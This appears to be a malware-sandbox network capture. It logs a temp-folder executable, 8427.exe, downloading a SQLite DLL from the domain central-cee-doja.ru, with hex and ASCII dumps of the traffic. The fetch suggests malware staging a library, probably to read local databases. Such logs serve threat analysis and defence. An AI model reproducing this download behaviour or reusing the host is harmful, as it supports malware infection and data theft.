2023-11-18 09:02:34 UTC	245	IN	Data Raw: 65 63 74 69 6f 6e 42 61 73 65 00 53 51 4c 69 74 65 43 68 61 6e 67 65 53 65 74 42 61 73 65 00 67 65 74 5f 4f 72 64 69 6e 61 6c 49 67 6e 6f 72 65 43 61 73 65 00 69 67 6e 6f 72 65 43 61 73 65 00 4e 6f 43 61 73 65 00 51 75 6f 74 65 64 49 64 65 6e 74 69 66 69 65 72 43 61 73 65 00 5f 62 61 73 65 00 67 65 74 5f 44 61 74 61 62 61 73 65 00 43 68 61 6e 67 65 44 61 74 61 62 61 73 65 00 42 61 63 6b 75 70 44 61 74 61 62 61 73 65 00 44 65 63 72 79 70 74 4c 65 67 61 63 79 44 61 74 61 62 61 73 65 00 64 61 74 61 62 61 73 65 00 73 71 6c 62 61 73 65 00 78 52 65 6c 65 61 73 65 00 72 65 6c 65 61 73 65 00 4d 69 73 75 73 65 5f 4e 6f 5f 4c 69 63 65 6e 73 65 00 49 6f 45 72 72 5f 44 69 72 5f 43 6c 6f 73 65 00 49 6f 45 72 72 5f 43 6c 6f 73 65 00 55 6e 62 69 6e 64 46 75 6e 63 74 69 Data Ascii: ectionBaseSQLiteChangeSetBaseget_OrdinalIgnoreCaseignoreCaseNoCaseQuotedIdentifierCase_baseget_DatabaseChangeDatabaseBackupDatabaseDecryptLegacyDatabasedatabasesqlbasexReleasereleaseMisuse_No_LicenseIoErr_Dir_CloseIoErr_CloseUnbindFuncti
2023-11-18 09:02:34 UTC	261	IN	Data Raw: 62 61 63 6b 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 72 6f 6c 6c 62 61 63 6b 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 61 75 74 68 6f 72 69 7a 65 72 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 61 75 74 68 6f 72 69 7a 65 72 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 70 72 6f 67 72 65 73 73 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 70 72 6f 67 72 65 73 73 48 61 6e 64 6c 65 72 00 53 51 4c 69 74 65 43 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 61 64 64 5f 5f 63 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 72 65 6d 6f 76 65 5f 5f 63 6f 6d 6d 69 74 48 61 6e 64 6c 65 72 00 41 64 64 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 52 65 6d 6f 76 65 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 49 6e 69 74 69 61 6c 69 7a 65 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 00 Data Ascii: backHandlerremove__rollbackHandleradd__authorizerHandlerremove__authorizerHandleradd__progressHandlerremove__progressHandlerSQLiteCommitHandleradd__commitHandlerremove__commitHandlerAddDefaultHandlerRemoveDefaultHandlerInitializeDefaultHandler
2023-11-18 09:02:34 UTC	262	IN	Data Raw: 72 00 41 70 70 6c 79 54 61 62 6c 65 46 69 6c 74 65 72 00 78 53 65 73 73 69 6f 6e 46 69 6c 74 65 72 00 78 46 69 6c 74 65 72 00 73 71 6c 69 74 65 33 73 65 73 73 69 6f 6e 5f 74 61 62 6c 65 5f 66 69 6c 74 65 72 00 54 72 79 45 6e 74 65 72 00 70 6f 69 6e 74 65 72 00 67 65 74 5f 44 61 74 61 41 64 61 70 74 65 72 00 73 65 74 5f 44 61 74 61 41 64 61 70 74 65 72 00 44 62 44 61 74 61 41 64 61 70 74 65 72 00 43 72 65 61 74 65 44 61 74 61 41 64 61 70 74 65 72 00 53 51 4c 69 74 65 44 61 74 61 41 64 61 70 74 65 72 00 53 51 4c 69 74 65 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 47 65 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 69 6e 70 75 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 6f 75 74 70 75 74 53 74 72 65 61 6d 41 64 61 70 74 65 72 00 73 74 72 65 61 6d 41 64 61 70 Data Ascii: rApplyTableFilterxSessionFilterxFiltersqlite3session_table_filterTryEnterpointerget_DataAdapterset_DataAdapterDbDataAdapterCreateDataAdapterSQLiteDataAdapterSQLiteStreamAdapterGetStreamAdapterinputStreamAdapteroutputStreamAdapterstreamAdap
2023-11-18 09:02:34 UTC	278	IN	Data Raw: 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 7b 00 30 00 7d 00 00 3b 63 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 65 00 20 00 64 00 61 00 74 00 61 00 62 00 61 00 73 00 65 00 20 00 6e 00 61 00 6d 00 65 00 00 80 83 63 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 20 00 7a 00 65 00 72 00 6f 00 20 00 28 00 30 00 29 00 20 00 74 00 79 00 70 00 65 00 20 00 6d 00 69 00 73 00 6d 00 61 00 74 00 63 00 68 00 2c 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 6f 00 66 00 20 00 74 00 79 00 70 00 65 00 20 00 7b 00 30 00 7d 00 00 80 81 63 00 6f 00 6e 00 66 00 69 00 67 00 75 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 Data Ascii: f type {0};cannot allocate database nameconfiguration element zero (0) type mismatch, must be of type {0}configuration eleme
2023-11-18 09:02:34 UTC	279	IN	Data Raw: 62 00 00 19 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 42 00 6c 00 6f 00 62 00 00 29 69 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 69 00 6e 00 70 00 75 00 74 00 20 00 62 00 75 00 66 00 66 00 65 00 72 00 00 53 69 00 6e 00 70 00 75 00 74 00 20 00 62 00 75 00 66 00 66 00 65 00 72 00 20 00 69 00 73 00 20 00 73 00 69 00 7a 00 65 00 64 00 20 00 7b 00 30 00 7d 00 20 00 62 00 79 00 74 00 65 00 73 00 2c 00 20 00 6e 00 65 00 65 00 64 00 20 00 7b 00 31 00 7d 00 00 5f 72 00 65 00 61 00 64 00 20 00 7b 00 30 00 7d 00 20 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 20 00 70 00 61 00 67 00 65 00 20 00 62 00 79 00 74 00 65 00 73 00 2c 00 20 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 7b 00 31 00 7d 00 20 00 28 00 32 00 29 00 00 35 66 00 61 Data Ascii: bpasswordBlob)invalid input bufferSinput buffer is sized {0} bytes, need {1}_read {0} encrypted page bytes, expected {1} (2)5fa
2023-11-18 09:02:34 UTC	295	IN	Data Raw: 00 41 00 47 00 4d 00 41 00 20 00 5b 00 7b 00 30 00 7d 00 5d 00 2e 00 69 00 6e 00 64 00 65 00 78 00 5f 00 6c 00 69 00 73 00 74 00 28 00 5b 00 7b 00 31 00 7d 00 5d 00 29 00 00 80 93 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 5b 00 7b 00 30 00 7d 00 5d 00 2e 00 5b 00 7b 00 32 00 7d 00 5d 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 5b 00 74 00 79 00 70 00 65 00 5d 00 20 00 4c 00 49 00 4b 00 45 00 20 00 27 00 69 00 6e 00 64 00 65 00 78 00 27 00 20 00 41 00 4e 00 44 00 20 00 5b 00 6e 00 61 00 6d 00 65 00 5d 00 20 00 4c 00 49 00 4b 00 45 00 20 00 27 00 7b 00 31 00 7d 00 27 00 01 03 27 00 01 05 27 00 27 00 01 23 73 00 71 00 6c 00 69 00 74 00 65 00 5f 00 61 00 75 00 74 00 6f 00 69 00 6e 00 64 00 65 00 78 00 5f 00 00 3d 50 Data Ascii: AGMA [{0}].index_list([{1}])SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [name] LIKE '{1}''''#sqlite_autoindex_=P
2023-11-18 09:02:34 UTC	311	IN	Data Raw: 4c 00 69 00 74 00 65 00 5f 00 42 00 61 00 73 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 00 45 50 00 72 00 65 00 4c 00 6f 00 61 00 64 00 53 00 51 00 4c 00 69 00 74 00 65 00 5f 00 55 00 73 00 65 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 00 47 50 00 72 00 65 00 4c 00 6f 00 61 00 64 00 53 00 51 00 4c 00 69 00 74 00 65 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 41 00 72 00 63 00 68 00 69 00 74 00 65 00 63 00 74 00 75 00 72 00 65 00 00 80 95 4e 00 61 00 74 00 69 00 76 00 65 00 20 00 6c 00 69 00 62 00 72 00 61 00 72 00 79 00 20 00 70 00 72 00 65 00 2d 00 6c 00 6f 00 61 00 64 00 65 00 72 00 20 00 69 00 73 00 20 00 74 00 72 00 79 00 69 00 6e 00 67 00 20 00 74 00 Data Ascii: Lite_BaseDirectoryEPreLoadSQLite_UseAssemblyDirectoryGPreLoadSQLite_ProcessorArchitectureNative library pre-loader is trying t
2023-11-18 09:02:34 UTC	327	IN	Data Raw: 00 04 00 10 00 00 04 00 00 10 00 04 30 f8 ff ff 04 64 00 00 00 04 1e 00 00 00 04 30 75 00 00 01 00 01 01 1e 7c 00 44 00 61 00 74 00 61 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 7c 00 02 5c 00 02 22 00 02 27 00 02 3d 00 02 3b 00 38 79 00 79 00 79 00 79 00 2d 00 4d 00 4d 00 2d 00 64 00 64 00 54 00 48 00 48 00 3a 00 6d 00 6d 00 3a 00 73 00 73 00 2e 00 66 00 66 00 66 00 66 00 66 00 66 00 66 00 4b 00 04 1f 00 00 00 04 20 00 00 00 04 21 00 00 00 04 af 07 00 00 04 65 00 00 00 04 ff 00 00 00 04 01 01 00 00 04 01 02 00 00 04 01 03 00 00 04 0a 01 00 00 04 0a 02 00 00 04 0a 03 00 00 04 0a 04 00 00 04 0a 05 00 00 04 0a 06 00 00 04 0a 07 00 00 04 0a 08 00 00 04 0a 09 00 00 04 0a 0a 00 00 04 0a 0b 00 00 04 0a 0c 00 00 04 0a 0d 00 00 04 0a 0e 00 00 04 0a Data Ascii: 0d0u\|DataDirectory\|\"'=;8yyyy-MM-ddTHH:mm:ss.fffffffK !e
2023-11-18 09:02:34 UTC	343	IN	Data Raw: 53 69 6d 70 73 6f 6e 20 28 72 6f 62 65 72 74 40 62 6c 61 63 6b 63 61 73 74 6c 65 73 6f 66 74 2e 63 6f 6d 29 0d 0a 20 2a 0d 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 74 6f 20 74 68 65 20 70 75 62 6c 69 63 20 64 6f 6d 61 69 6e 2c 20 75 73 65 20 61 74 20 79 6f 75 72 20 6f 77 6e 20 72 69 73 6b 21 0d 0a 20 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0d 0a 2d 2d 3e 0d 0a 0d 0a 3c 44 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3e 0d 0a 20 20 3c 44 61 74 61 54 79 70 65 73 3e 0d 0a 20 20 20 20 3c 54 79 70 65 4e 61 6d 65 3e 73 6d 61 6c 6c 69 6e 74 3c 2f 54 79 70 65 4e 61 6d 65 3e 0d 0a 20 20 20 20 3c 50 72 6f 76 69 64 65 72 44 62 54 79 70 65 3e Data Ascii: Simpson (robert@blackcastlesoft.com) * * Released to the public domain, use at your own risk! ********************************************************/--><DocumentElement> <DataTypes> <TypeName>smallint</TypeName> <ProviderDbType>
2023-11-18 09:02:34 UTC	359	IN	Data Raw: 3e 31 3c 2f 50 72 6f 76 69 64 65 72 44 62 54 79 70 65 3e 0d 0a 20 20 20 20 3c 43 6f 6c 75 6d 6e 53 69 7a 65 3e 32 31 34 37 34 38 33 36 34 37 3c 2f 43 6f 6c 75 6d 6e 53 69 7a 65 3e 0d 0a 20 20 20 20 3c 44 61 74 61 54 79 70 65 3e 53 79 73 74 65 6d 2e 42 79 74 65 5b 5d 3c 2f 44 61 74 61 54 79 70 65 3e 0d 0a 20 20 20 20 3c 43 72 65 61 74 65 46 6f 72 6d 61 74 3e 62 6c 6f 62 3c 2f 43 72 65 61 74 65 46 6f 72 6d 61 74 3e 0d 0a 20 20 20 20 3c 49 73 41 75 74 6f 49 6e 63 72 65 6d 65 6e 74 61 62 6c 65 3e 66 61 6c 73 65 3c 2f 49 73 41 75 74 6f 49 6e 63 72 65 6d 65 6e 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 49 73 43 61 73 65 53 65 6e 73 69 74 69 76 65 3e 66 61 6c 73 65 3c 2f 49 73 43 61 73 65 53 65 6e 73 69 74 69 76 65 3e 0d 0a 20 20 20 20 3c 49 73 46 69 78 65 64 4c 65 Data Ascii: >1</ProviderDbType> <ColumnSize>2147483647</ColumnSize> <DataType>System.Byte[]</DataType> <CreateFormat>blob</CreateFormat> <IsAutoIncrementable>false</IsAutoIncrementable> <IsCaseSensitive>false</IsCaseSensitive> <IsFixedLe
2023-11-18 09:02:34 UTC	375	IN	Data Raw: 3c 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3c 2f 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 0a 20 20 20 20 3c 4e 75 6d 62 65 72 4f 66 52 65 73 74 72 69 63 74 69 6f 6e 73 3e 30 3c 2f 4e 75 6d 62 65 72 4f 66 52 65 73 74 72 69 63 74 69 6f 6e 73 3e 0a 20 20 20 20 3c 4e 75 6d 62 65 72 4f 66 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 73 3e 30 3c 2f 4e 75 6d 62 65 72 4f 66 49 64 65 6e 74 69 66 69 65 72 50 61 72 74 73 3e 0a 20 20 3c 2f 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3e 0a 20 20 3c 4d 65 74 61 44 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 73 3e 0a 20 20 20 20 3c 43 6f 6c 6c 65 63 74 69 6f 6e 4e 61 6d 65 3e 44 61 74 61 53 6f 75 72 63 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 43 6f Data Ascii: <CollectionName>MetaDataCollections</CollectionName> <NumberOfRestrictions>0</NumberOfRestrictions> <NumberOfIdentifierParts>0</NumberOfIdentifierParts> </MetaDataCollections> <MetaDataCollections> <CollectionName>DataSourceInformation</Co
2023-11-18 09:02:34 UTC	391	IN	Data Raw: dd 28 eb 5f 26 a1 95 58 48 d5 1a fe d7 27 3f fd 90 d1 76 86 dd 1c b0 60 5c f3 0d a8 ee e0 89 a1 bd 39 e1 38 4e da 6e bb 36 9d fb e5 21 53 5a c3 ca e9 6a f1 a2 3e db 43 b8 33 c8 4f 38 14 92 99 f5 dd ce 54 6d d9 5d 02 14 1f 40 33 7c 03 e2 95 b2 c2 21 75 73 52 cb 46 d8 c4 34 1c a2 a5 4b 8d cd 6f 76 37 2c 85 3f 1a ce 26 e9 18 be 90 07 b0 43 7f 95 88 20 82 70 f0 cc ca ef fd 29 35 5c 1f 89 38 55 f7 37 8a 8b 09 a1 cb 0b e9 31 1a ff 2e 19 5c 39 71 e1 be 9c a7 0a 06 d6 26 67 b7 92 e6 4e 5f de 7a ac 49 cf 2e a4 74 92 ad db 3c a4 9c 86 1f e3 c1 56 1b 2b 23 ff 8f b5 ea 88 7b 70 6b e6 a0 ba fd 3a 3f 45 a6 c4 e8 16 91 52 8b 41 c0 48 84 4b 96 4d ab 44 40 e3 8d f0 15 28 ce ed f1 18 56 07 2a 2f 10 c4 0c 08 64 3c 33 8f ae 28 8c 3c cb 8f 88 0b 0d bf 3b f4 ce 1e 7b 8e ef b5 Data Ascii: (_&XH'?v`\98Nn6!SZj>C3O8Tm]@3\|!usRF4Kov7,?&C p)5\8U71.\9q&gN_zI.t<V+#{pk:?ERAHKMD@(V*/d<3(<;{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	104.21.89.193	443	192.168.2.4	49743	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:32 UTC	13	OUT	GET /dlls/System.Data.SQLite.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:33 UTC	13	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:33 GMT Content-Type: application/x-msdos-program Content-Length: 393520 Connection: close Last-Modified: Tue, 02 Nov 2021 17:44:02 GMT ETag: "60130-5cfd1d6c67c80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ql356aehV4NGLT%2B6miOp29RTYNsD2%2F2MUAySGhMeISWkPfxerru1ujnbSj4Kt5SxFvs4x6cc7QIUgtbafHQ7hw86VlMyT7H18SSnUHrRaTrXAgMuhbdKSJJrBepLa4B9Kt%2FMPZfL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0901be4308ff-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:33 UTC	14	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 b6 05 00 00 08 00 00 00 00 00 00 a6 d3 05 00 00 20 00 00 00 e0 05 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 d9 86 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 `
2023-11-18 09:02:33 UTC	15	IN	Data Raw: 3d 00 00 0a 2c 7a 02 0e 04 0e 06 73 2c 06 00 06 7d 08 00 00 04 02 0e 05 7d 09 00 00 04 02 0e 05 7d 0a 00 00 04 14 1f 09 14 14 14 14 02 7b 08 00 00 04 0e 05 1d 8d 1c 00 00 01 25 16 d0 05 00 00 02 28 3e 00 00 0a a2 25 17 03 8c 3d 00 00 02 a2 25 18 04 8c 21 00 00 01 a2 25 19 05 a2 25 1a 0e 04 8c b1 00 00 01 a2 25 1b 0e 05 a2 25 1c 0e 06 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 2a 76 72 29 00 00 70 14 28 5c 05 00 06 2c 08 02 17 7d 18 00 00 04 2a 02 16 7d 18 00 00 04 2a 1e 02 7b 18 00 00 04 2a 7a 02 7b 19 00 00 04 2c 15 d0 05 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 00 1b 30 02 00 27 00 00 00 00 00 00 00 02 7b 19 00 00 04 2d 0d 02 28 0e 00 00 06 02 17 6f df 00 00 06 de 0f 02 03 28 4e 01 00 06 02 17 7d 19 00 00 04 dc 2a 00 01 10 00 00 Data Ascii: =,zs,}}}{%(>%=%!%%%%s(vr)p(\,}}{z{,(>o?s@z0'{-(o(N}
2023-11-18 09:02:33 UTC	16	IN	Data Raw: 06 0c 08 7e 3c 00 00 0a 28 3d 00 00 0a 2d c8 06 6f 56 00 00 0a 2a 5e 02 7b 08 00 00 04 02 7b 08 00 00 04 28 2b 06 00 06 28 58 01 00 06 2a 1b 30 06 00 6b 00 00 00 06 00 00 11 7e 3c 00 00 0a 0a 03 2c 07 03 28 ff 06 00 06 0a 02 7b 08 00 00 04 28 2b 06 00 06 06 28 ec 05 00 06 0b 07 15 33 1f 28 57 00 00 0a 72 8d 00 00 70 17 8d 1c 00 00 01 25 16 03 a2 28 40 05 00 06 73 02 04 00 06 7a 07 2c 03 17 2b 01 16 0c de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 08 2a 00 01 10 00 00 02 00 06 00 49 4f 00 1a 00 00 00 00 46 02 7b 08 00 00 04 28 2b 06 00 06 28 a3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 8a 05 00 06 2a 1a 28 25 00 00 06 2a 1a 28 a5 05 00 06 2a 1a 28 27 00 00 06 2a 1e 16 28 a6 05 00 06 2a 7e 02 7b 08 00 00 04 2d Data Ascii: ~<(=-oV^{{(+(X0k~<,({(+(3(Wrp%(@sz,+~<(=,(~<IOF{(+(F{(+((%(('(*~{-
2023-11-18 09:02:33 UTC	17	IN	Data Raw: 00 70 73 02 04 00 06 7a 03 28 a8 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 1b 30 03 00 d1 00 00 00 0b 00 00 11 14 0b 28 67 00 00 0a 0c 03 7b f0 02 00 04 7b cf 00 00 04 20 e8 03 00 00 5a 0d 02 28 12 00 00 06 26 00 de 12 03 7b ec 02 00 04 28 31 06 00 06 28 b5 05 00 06 0a dc 02 28 11 00 00 06 2c 18 06 2c 0a 06 1f 64 2e 05 06 1f 65 33 03 1f 09 0a 06 14 73 01 04 00 06 7a 06 1f 09 33 02 16 2a 06 1f 64 33 02 17 2a 06 1f 65 33 02 16 2a 06 2c b3 02 03 6f e8 00 00 06 13 04 11 04 2d 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 11 04 1c 2e 05 11 04 1b 33 8f 03 7b f0 02 00 04 2c 87 07 2d 06 73 68 00 00 0a 0b 28 67 00 00 0a 08 59 09 36 0e 11 04 02 6f e1 00 00 06 73 01 04 00 06 7a 07 17 20 96 00 00 00 6f 69 00 00 0a 28 6a 00 00 0a 38 50 ff ff ff 00 Data Ascii: psz(,osz0(g{{ Z(&{(1((,,d.e3sz3d3e3,o-osz.3{,-sh(gY6osz oi(j8P
2023-11-18 09:02:33 UTC	19	IN	Data Raw: 33 04 1f 09 13 04 11 04 14 73 01 04 00 06 7a 11 04 1f 09 3b 88 01 00 00 11 04 1f 11 33 0b 11 05 17 58 13 05 38 5e 01 00 00 11 04 17 40 15 01 00 00 02 6f e1 00 00 06 72 e7 01 00 70 1b 28 77 00 00 0a 2d 73 04 1f 3b 6f 78 00 00 0a 13 10 11 10 15 33 0a 04 6f 74 00 00 0a 17 59 13 10 04 16 11 10 17 58 6f 79 00 00 0a 13 08 04 11 10 17 58 6f 7a 00 00 0a 10 02 0e 05 7e 72 00 00 0a 51 2b 14 02 03 04 05 0e 04 0e 05 6f e5 00 00 06 13 09 0e 05 50 10 02 11 09 2d 09 04 6f 74 00 00 0a 16 30 df 11 09 2c 09 11 09 11 08 6f 18 05 00 06 11 09 13 11 dd 69 01 00 00 02 7b 12 00 00 04 3a c5 00 00 00 02 6f e1 00 00 06 16 72 1d 02 00 70 16 1f 1a 1b 28 7b 00 00 0a 3a ab 00 00 00 0e 05 7e 72 00 00 0a 51 02 17 7d 12 00 00 04 7e 92 02 00 04 d0 09 00 00 02 28 3e 00 00 0a 6f 2e 00 00 0a Data Ascii: 3sz;3X8^@orp(w-s;ox3otYXoyXoz~rQ+oP-ot0,oi{:orp({:~rQ}~(>o.
2023-11-18 09:02:33 UTC	20	IN	Data Raw: 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 64 00 00 00 15 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c bf 00 00 01 28 40 00 00 06 04 1f 40 6a 28 36 05 00 06 2c 14 0e 04 6e 0c 06 28 31 06 00 06 05 08 28 ae 05 00 06 0b 2b 0f 06 28 31 06 00 06 05 0e 04 28 ad 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c3 00 00 01 28 40 00 00 06 06 28 31 06 00 06 05 0e 04 28 ae 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c4 00 00 01 Data Ascii: osz0d{{-(9,(@@j(6,n(1(+(1(,osz0E{{-(9,(@(1(,osz*0E{{-(9,
2023-11-18 09:02:33 UTC	21	IN	Data Raw: 06 00 62 00 00 00 19 00 00 11 03 7b ec 02 00 04 0a 06 28 31 06 00 06 05 28 6a 03 00 06 28 b3 05 00 06 0b 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 37 06 28 31 06 00 06 0c 28 57 00 00 0a 72 30 04 00 70 19 8d 1c 00 00 01 25 16 08 8c b1 00 00 01 a2 25 17 05 a2 25 18 07 8c b5 00 00 01 a2 28 40 05 00 06 28 b2 04 00 06 07 2a 46 03 7b ec 02 00 04 28 31 06 00 06 28 b4 05 00 06 2a 13 30 03 00 36 00 00 00 1b 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 70 05 00 06 25 7e 3c 00 00 0a 28 66 00 00 0a 2c 0d 1d 02 6f e1 00 00 06 73 01 04 00 06 7a 06 28 6d 03 00 06 2a 4a 03 7b ec 02 00 04 28 31 06 00 06 04 28 bd 05 00 06 2a 00 00 00 13 30 04 00 66 00 00 00 1c 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 6e 05 00 06 0b 05 02 03 04 6f fb 00 Data Ascii: b{(1(j({-(9,7(1(Wr0p%%%(@(F{(1(06{(1(p%~<(f,osz(mJ{(1(0f{(1(no
2023-11-18 09:02:33 UTC	23	IN	Data Raw: 0e 04 2d 03 06 6a 2a 07 0e 05 58 0e 04 8e 69 31 08 0e 04 8e 69 0e 05 59 0b 07 05 58 06 31 04 06 05 59 0b 07 16 31 0e 08 05 0e 04 0e 05 07 6f 91 00 00 0a 2b 02 16 0b 07 6a 2a 32 02 03 04 6f fb 00 00 06 1b fe 01 2a 1e 03 28 bf 05 00 06 2a 00 00 13 30 09 00 6f 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 1a 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 06 2d 2b 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 17 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 0e 07 2c 10 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 06 2a 00 13 30 05 00 55 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 18 7e 3c 00 00 0a 05 28 be 05 00 06 0a 06 2d 1e 02 7b 08 00 00 Data Ascii: -jXi1iYX1Y1o+j2o(0o{(+(j~<-+(-+{(+(j~<-+(,,osz*0U{(+(j~<(-{
2023-11-18 09:02:33 UTC	24	IN	Data Raw: 06 25 2c 09 0e 04 02 6f e1 00 00 06 51 0b de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 07 2a 01 10 00 00 02 00 18 00 28 40 00 1a 00 00 00 00 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 0c 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 10 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13 30 02 Data Ascii: %,oQ~<(=,(~<(@0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV*0
